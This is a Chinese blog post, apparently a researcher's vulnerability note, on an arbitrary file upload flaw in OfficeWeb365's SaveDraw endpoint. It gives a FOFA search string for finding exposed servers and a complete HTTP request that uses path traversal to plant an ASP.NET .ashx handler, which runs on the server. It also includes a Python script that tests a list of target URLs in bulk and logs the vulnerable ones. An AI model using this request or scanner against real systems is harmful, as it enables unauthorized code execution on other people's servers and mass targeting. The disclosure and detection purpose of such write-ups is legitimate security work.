_副本-qdff.png)
OfficeWeb365 SaveDraw 任意文件上传漏洞
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!
一、漏洞名称
OfficeWeb365 SaveDraw 任意文件上传漏洞
二、漏洞影响
OfficeWeb365
三、漏洞描述
OfficeWeb365 SaveDraw 接口存在任意文件上传漏洞,攻击者通过漏洞可以在服务器中上传任意文件获取服务器权限。
四、资产FOFA搜索语句
"OfficeWeb365"五、漏洞复现
第一步、向目标发送如下请求数据包,计算44 * 41的值,并将计算结果写入文件drawPW10.ashx
POST /PW/SaveDraw?path=../../Content/img&idx=10.ashx HTTP/1.1
Host: xx.xx.xx.xx:8088
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Content-Type: application/x-www-form-urlencoded
data:image/png;base64,{{filehash}}<%@ Language="C#" Class="Handler1" %>public class Handler1:System.Web.IHttpHandler
{
public void ProcessRequest(System.Web.HttpContext context)
{
System.Web.HttpResponse response = context.Response;
response.Write(44 * 41);
string filePath = context.Server.MapPath("/") + context.Request.Path;
if (System.IO.File.Exists(filePath))
{
System.IO.File.Delete(filePath);
}
}
public bool IsReusable
{
get { return false; }
}
}///---响应内容如下,表示命令执行成功
HTTP/1.1 200 OKCache-Control: privateVary: Accept-EncodingX-Powered-By: OfficeWeb365Content-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5Date: Thu, 07 Sep 2023 07:51:25 GMT
ok第二步,请求路径http://xx.xx.xx.xx:8088/Content/img/UserDraw/drawPW10.ashx查看执行结果文件
GET /Content/img/UserDraw/drawPW10.ashx HTTP/1.1
Host: xx.xx.xx.xx:8088
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36响应内容如下,页面包含了44 * 41的结果
HTTP/1.1 200 OKX-Powered-By: OfficeWeb365Date: Thu, 07 Sep 2023 07:51:26 GMTCache-Control: privateContent-Type: text/html; charset=utf-8Vary: Accept-EncodingServer: Microsoft-IIS/7.5
1804证明存在该漏洞
六、漏洞验证poc
该python脚本可以批量检测漏洞,C:\Users\DELL\Desktop\1006.txt为输入目标文件,每行是一个url
import argparse
import time
import requests
def get_url(file):
with open('{}'.format(file),'r',encoding='utf-8') as f:
for i in f:
i = i.replace('\n', '')
send_req(i)
def write_result(content):
f = open("result.txt", "a", encoding="UTF-8")
f.write('{}\n'.format(content))
f.close()
def send_req(url_check):
print('{} runing Check'.format(url_check))
url = url_check + '/PW/SaveDraw?path=../../Content/img&idx=10.ashx'
header = {
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36',
'Content-Type':'application/x-www-form-urlencoded'
}
data = (
'data:image/png;base64,{{filehash}}<%@ Language="C#" Class="Handler1" %>public class\r\n'
'Handler1:System.Web.IHttpHandler\r\n'
'{\r\n'
'public void ProcessRequest(System.Web.HttpContext context)\r\n'
'{\r\n'
'System.Web.HttpResponse response = context.Response;\r\n'
'response.Write(44 * 41);\r\n'
'\r\n'
'string filePath = context.Server.MapPath("/") + context.Request.Path;\r\n'
'if (System.IO.File.Exists(filePath))\r\n'
'{\r\n'
'System.IO.File.Delete(filePath);\r\n'
'}\r\n'
'}\r\n'
'public bool IsReusable\r\n'
'{\r\n'
'get { return false; }\r\n'
'}\r\n'
'}///---\r\n'
)
try:
requests.packages.urllib3.disable_warnings()
response = requests.post(url=url,headers=header,data=data,verify=False,timeout=3)
url2 = "{}/Content/img/UserDraw/drawPW10.ashx".format(url_check)
res2 = requests.get(url2, verify=False)
if response.status_code == 200 and res2.status_code == 200 and '1804' in res2.text:
result = '{} 存在OfficeWeb365 SaveDraw 任意文件上传漏洞! 请访问目标自测:{} \n'.format(url_check,url2)
print(result)
write_result(result)
time.sleep(1)
except Exception as e:
pass
if __name__ == '__main__':
file = r"C:\Users\DELL\Desktop\1006.txt"
get_url(file)
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
阅读建议
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果
